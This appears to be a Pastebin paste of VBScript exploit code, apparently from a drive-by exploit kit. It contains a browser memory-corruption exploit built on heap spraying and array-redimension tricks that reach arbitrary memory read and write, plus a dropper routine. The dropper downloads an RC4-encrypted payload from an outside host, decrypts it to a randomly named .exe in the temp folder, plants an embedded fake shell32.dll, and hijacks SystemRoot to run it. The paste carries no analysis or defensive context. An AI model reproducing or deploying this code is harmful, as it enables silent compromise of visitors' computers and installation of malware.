Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Dim aw
- Dim lunnga(32)
- Dim y(32)
- k1 = 1
- k2 = 1999 + k1
- fix1 = "%u4141"
- fastfix = fix1 & fix1
- k3 = 32
- fix3 = fastfix & fix1
- zerofix = "%u0000"
- trifix = zerofix & zerofix & zerofix
- d = fastfix & "%u0016" & fix3 & "%u4242%u4242"
- b = String(k2*k3, "D")
- c = d & b
- x = UnEscape(c)
- Class MiddleD
- End Class
- Class Wararape
- Dim Cod()
- Private Sub Class_Initialize
- ReDim Preserve Cod(k1, k2)
- End Sub
- Public Sub ZeroineL()
- ReDim Preserve Cod(k1, k1)
- End Sub
- End Class
- Function GogoGoA (arg1, s)
- aw = Null
- Set aw = New Wararape
- For i = 0 To k3
- Set lunnga(i) = s
- Next
- Set aw.Cod(arg1, 2) = s
- Dim addr
- Dim i
- For i = 0 To k3-1
- If Asc(Mid(y(i), 3, 1)) = VarType(s) Then
- addr = strToInt(Mid(y(i), 3 + 4, 2))
- End If
- y(i) = Null
- Next
- If addr = Null Then
- document.location.href = document.location.href
- Return
- End If
- GogoGoA = addr
- End Function
- Function LikeMeLike (arg1, addr)
- d = fastfix & "%u0008" & fix3
- c = d & intToStr(addr) & b
- x = UnEscape(c)
- aw = Null
- Set aw = New Wararape
- Dim o
- o = aw.Cod(arg1, 2)
- LikeMeLike = o
- End Function
- Sub Rewwati (arg1, addr)
- d = fastfix & "%u400C" & trifix
- c = d & intToStr(addr) & b
- x = UnEscape(c)
- aw = Null
- Set aw = New Wararape
- aw.Cod(arg1, 2) = CSng(0)
- End Sub
- Sub Rewwati2 (arg1, addr)
- Dim emptyval
- d = fastfix & "%u400C" & trifix
- c = d & intToStr(addr) & b
- x = UnEscape(c)
- aw = Null
- Set aw = New Wararape
- aw.Cod(arg1, 2) = emptyval
- End Sub
- Function ProtectMe (arg1)
- Dim addr
- Dim sexy
- Dim koles
- Dim mem
- Set dm = New MiddleD
- addr = GogoGoA(arg1, dm)
- mem = LikeMeLike(arg1, addr + 8)
- sexy = strToInt(Mid(mem, 3, 2))
- mem = LikeMeLike(arg1, sexy + 4)
- koles = strToInt(Mid(mem, 1, 2))
- Rewwati arg1, koles + &H174
- fire()
- Rewwati2 arg1, koles + &H174
- End Function
- Function rnds(strLen)
- Dim str
- Const LETTERS = "abcdehiklmnoprstuw02346"
- Randomize
- For i = 1 to strLen
- str = str & Mid(LETTERS, Int(23*Rnd+1), 1)
- Next
- rnds = str
- End Function
- Sub fire()
- On Error Resume Next
- key="gexywoaxor"
- url="http://far.nycfatfreeze.com/?q=w3bQMvXcJxfQFYbGMvPDSKNbNkjWHViPxo2G9MildZaqZGX_k7HDfF-qoVrcCgWRxfMuf&oq=ONWPwHij0OCfgAzydteVlkU9q-ohkiAnx-b1pKDrBSIYAwRq6KcHbAy0VT8xrIdQJZnxA"
- uas=Navigator.userAgent
- Set oss=GetObject("winmgmts:").InstancesOf("Win32_OperatingSystem")
- Dim osloc
- for each os in oss
- osloc=os.OSLanguage
- next
- SetLocale(osloc)
- Set req=CreateObject("WinHTTP.WinHTTPRequest.5.1")
- req.SetProxy 0
- req.Open "GET",url,0
- req.Option(0)=uas
- req.Send
- If 200=req.status Then
- z=req.responseBody
- Set c=CreateObject("Scripting.FileSystemObject")
- tmp=c.GetSpecialFolder(2)
- fake32=tmp&"\System32"
- If Not c.FolderExists(fake32) Then
- c.CreateFolder(fake32)
- End If
- Dim dllcode,dlltxt,fakedll
- dllcode= Array(&h4d,&h5a,&h80,0,1,0,0,0,4,0,&h10,0,&hff,&hff,0,0,&h40,1,0,0,0,0,0,0,&h40,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,&h80,0,0,0,&he,&h1f,&hba,&he,0,&hb4,9,&hcd,&h21,&hb8,1,&h4c,&hcd,&h21,&h54,&h68,&h69,&h73,&h20,&h70,&h72,&h6f,&h67,&h72,&h61,&h6d,&h20,&h63,&h61,&h6e,&h6e,&h6f,&h74,&h20,&h62,&h65,&h20,&h72,&h75,&h6e,&h20,&h69,&h6e,&h20,&h44,&h4f,&h53,&h20,&h6d,&h6f,&h64,&h65,&h2e,&hd,&ha,&h24,0,0,0,0,0,0,0,0,&h50,&h45,0,0,&h4c,1,4,0,&h21,&h3c,&h6e,&h58,0,0,0,0,0,0,0,0,&he0,0,&he,&h21,&hb,1,1,&h47,0,2,0,0,0,6,0,0,0,0,0,0,0,&h10,0,0,0,&h10,0,0,0,&h20,0,0,0,0,&h40,0,0,&h10,0,0,0,2,0,0,1,0,0,0,0,0,0,0,4,0,0,0,0,0,0,0,0,&h50,0,0,0,4,0,0,&h15,&h5b,0,0,2,0,&h40,0,0,&h10,0,0,0,&h10,0,0,0,0,1,0,0,0,0,0,0,0,0,0,&h10,0,0,0,0,0,0,0,0,0,0,0,0,&h30,0,0,&hfc,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,&h40,0,0,&h28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,&h2e,&h74,&h65,&h78,&h74,0,0,0,&ha1,0,0,0,0,&h10,0,0,0,2,0,0,0,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,&h20,0,0,&h60,&h2e,&h64,&h61,&h74,&h61,0,0,0,&hee,1,0,0,0,&h20,0,0,0,2,0,0,0,6,0,0,0,0,0,0,0,0,0,0,0,0,0,0,&h40,0,0,&hc0,&h2e,&h69,&h64,&h61,&h74,&h61,0,0,&hfc,0,0,0,0,&h30,0,0,0,2,0,0,0,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,&h40,0,0,&hc0,&h2e,&h72,&h65,&h6c,&h6f,&h63,0,0,&h28,0,0,0,0,&h40,0,0,0,2,0,0,0,&ha,0,0,0,0,0,0,0,0,0,0,0,0,0,0,&h40,0,0,&h42,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,&h55,&h89,&he5,&h83,&h7d,&hc,1,&hf,&h85,&h8b,0,0,0,&hb9,&h96,0,0,0,&h49,&hf6,&h91,&h58,&h21,&h40,0,&h80,&hb1,&h58,&h21,&h40,0,&ha3,&h85,&hc9,&h75,&hee,&h68,&h58,&h21,&h40,0,&h6a,1,&h6a,1,&h6a,0,&hff,&h15,&h6c,&h30,&h40,0,&hff,&h15,&h74,&h30,&h40,0,&h85,&hc0,&h75,&h59,&hc7,5,4,&h21,&h40,0,&h44,0,0,0,&hc7,5,&h30,&h21,&h40,0,1,1,0,0,&h68,4,1,0,0,&h68,0,&h20,&h40,0,&hff,&h15,&h70,&h30,&h40,0,&h68,0,&h20,&h40,0,&h68,&he3,&h21,&h40,0,&hff,&h15,&h78,&h30,&h40,0,&h68,&h48,&h21,&h40,0,&h68,4,&h21,&h40,0,&h6a,0,&h6a,0,&h6a,0,&h6a,0,&h6a,0,&h6a,0,&h68,&h7d,&h21,&h40,0,&h6a,0,&h6a,0,&hff,&h15,&hdc,&h30,&h40,0,&hb8,1,0,0,0,&hc9,&hc2,&hc,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,&h3f,&h6c,&h6b,&h6b,&h38,&h38,&h39,&h6a,&h71,&h6a,&h6f,&h6a,&h68,&h71,&h68,&h68,&h6d,&h65,&h71,&h3d,&h3f,&h38,&h6e,&h71,&h3e,&h64,&h69,&h6c,&h69,&h64,&h6d,&h3e,&h64,&h3a,&h6a,&h68,&h5c,&h3f,&h5c,&h31,&h5c,&h38,&h5c,&h72,&h5c,&h39,&h5c,&h24,&h5c,&h39,&h5c,&h7c,&h5c,&h73,&h5c,&h3f,&h5c,&h7c,&h5c,&h2f,&h5c,&h28,&h5c,&h3d,&h5c,&h2e,&h5c,&h28,&h5c,&h7c,&h5c,&h79,&h5c,&hf,&h5c,&h25,&h5c,&h2f,&h5c,&h1a,&h5c,&h35,&h5c,&h30,&h5c,&h39,&h5c,&h32,&h5c,&h3d,&h5c,&h31,&h5c,&h39,&h5c,&h79,&h5c,&h7c,&h5c,&h7a,&h5c,&h7c,&h5c,&h2e,&h5c,&h38,&h5c,&h7c,&h5c,&h73,&h5c,&h2f,&h5c,&h7c,&h5c,&h73,&h5c,&h2d,&h5c,&h7c,&h5c,&hf,&h5c,&h25,&h5c,&h2f,&h5c,&h28,&h5c,&h39,&h5c,&h31,&h5c,&h6f,&h5c,&h6e,&h5c,&h5c,&h5c,&hf,&h25,&h2f,&h28,&h39,&h31,&he,&h33,&h33,&h28,&h5c,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,&h58,&h30,0,0,0,0,0,0,0,0,0,0,&h3c,&h30,0,0,&h6c,&h30,0,0,&hd4,&h30,0,0,0,0,0,0,0,0,0,0,&h4a,&h30,0,0,&hdc,&h30,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,&h4b,&h45,&h52,&h4e,&h45,&h4c,&h33,&h32,&h2e,&h44,&h4c,&h4c,0,0,&h41,&h44,&h56,&h41,&h50,&h49,&h33,&h32,&h2e,&h44,&h4c,&h4c,0,0,&h80,&h30,0,0,&h90,&h30,0,0,&ha8,&h30,0,0,&hb8,&h30,0,0,0,0,0,0,&h80,&h30,0,0,&h90,&h30,0,0,&ha8,&h30,0,0,&hb8,&h30,0,0,0,0,0,0,0,0,&h43,&h72,&h65,&h61,&h74,&h65,&h45,&h76,&h65,&h6e,&h74,&h41,0,0,0,0,&h47,&h65,&h74,&h57,&h69,&h6e,&h64,&h6f,&h77,&h73,&h44,&h69,&h72,&h65,&h63,&h74,&h6f,&h72,&h79,&h41,0,0,0,0,&h47,&h65,&h74,&h4c,&h61,&h73,&h74,&h45,&h72,&h72,&h6f,&h72,0,0,0,0,&h53,&h65,&h74,&h45,&h6e,&h76,&h69,&h72,&h6f,&h6e,&h6d,&h65,&h6e,&h74,&h56,&h61,&h72,&h69,&h61,&h62,&h6c,&h65,&h41,0,0,0,&he4,&h30,0,0,0,0,0,0,&he4,&h30,0,0,0,0,0,0,0,0,&h43,&h72,&h65,&h61,&h74,&h65,&h50,&h72,&h6f,&h63,&h65,&h73,&h73,&h41,&h73,&h55,&h73,&h65,&h72,&h57,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,&h10,0,0,&h28,0,0,0,&h15,&h30,&h1b,&h30,&h25,&h30,&h31,&h30,&h37,&h30,&h41,&h30,&h4b,&h30,&h59,&h30,&h5f,&h30,&h64,&h30,&h69,&h30,&h6f,&h30,&h74,&h30,&h79,&h30,&h8a,&h30,&h94,&h30,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0)
- For i=0 to Ubound(dllCode)
- dllCode(i) = Chr(dllCode(i))
- Next
- dlltxt = Join(dllcode,"")
- fakedll = c.BuildPath(fake32,"shell32.dll")
- Set b=c.CreateTextFile(fakedll)
- b.Write dlltxt
- b.Close
- f=c.BuildPath(tmp,rnds(8)&".exe")
- Set stream=CreateObject("ADODB.Stream")
- stream.Open
- stream.Type=1
- stream.Write z
- arcnsave stream,key,f
- stream.Close
- Set w=CreateObject("WScript.Shell")
- w.CurrentDirectory=tmp
- oldroot=w.Environment("Process").Item("SystemRoot")
- w.Environment("Process").Item("SystemRoot")=tmp
- w.Environment("Process").Item("SysFilename")=f
- Set sh = CreateObject("Shell.Application")
- Environment("Process").Item("SystemRoot")=oldroot
- End If
- End Sub
- Sub arcnsave(stream,strKey,fname)
- Dim kLen,x,y,i,j,t,slen,aBuf,bStream
- Dim s(256),k(256)
- klen=Len(strKey)
- For i=0 To 255
- s(i)=i
- k(i)=AscB(Mid(strKey, (i Mod klen)+1,1))
- Next
- j=0
- For i=0 To 255
- j=(j+k(i)+s(i)) And 255
- t=s(i):s(i)=s(j):s(j)=t
- Next
- slen=stream.position
- redim rc(slen)
- stream.position=0
- x=0:y=0
- For i=0 To slen-1
- x=(x+1) And 255
- y=(y+s(x)) And 255
- t=s(x):s(x)=s(y):s(y)=t
- rc(i)=Chr(CByte(s((s(x)+s(y)) And 255) Xor AscB(stream.Read(1))))
- Next
- Dim rctxt: rctxt = join(rc,"")
- Set c=CreateObject("Scripting.FileSystemObject")
- Set b=c.CreateTextFile(fname)
- b.Write rctxt
- b.Close
- End Sub
- Function SmuggleFag
- aw.ZeroineL()
- Dim i
- For i = 0 To k3
- y(i) = Mid(x, 1, k2*12)
- Next
- End Function
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
